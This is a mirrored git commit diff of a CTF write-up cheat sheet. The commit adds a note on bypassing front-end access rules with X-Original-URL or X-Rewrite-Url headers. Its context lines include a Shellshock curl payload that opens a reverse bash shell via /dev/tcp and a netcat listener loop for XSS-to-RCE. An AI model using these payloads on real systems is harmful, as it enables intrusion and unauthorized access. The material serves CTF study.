mirror of
https://github.com/AbdullahRizwan101/CTF-Writeups
synced 2024-11-24 21:03:07 +00:00
Update Cheat Sheet.md
This commit is contained in:
parent
d5ff6fce86
commit
5e859397c5
1 changed files with 6 additions and 0 deletions
|
@ -531,6 +531,12 @@ curl -H 'User-Agent: () { :; }; /bin/bash -i >& /dev/tcp/IP/PORT 0>&1' http://Re
|
|||
|
||||
`use multi/http/apache_mod_cgi_bash_env_exec`
|
||||
|
||||
### Symfony / Frontend server rule bypass
|
||||
|
||||
If we have don't have access to an endpoint could be an admin panel , we can just request for a `/` and at that point in either `X-Original-URL` or ` X-Rewrite-Url`
|
||||
|
||||
https://githubmemory.com/repo/sting8k/BurpSuite_403Bypasser/issues/4
|
||||
|
||||
### XSS to RCE
|
||||
```
|
||||
Attacker: while :; do printf "j$ "; read c; echo $c | nc -lp PORT >/dev/null; done
|
||||
|
|
Loading…
Reference in a new issue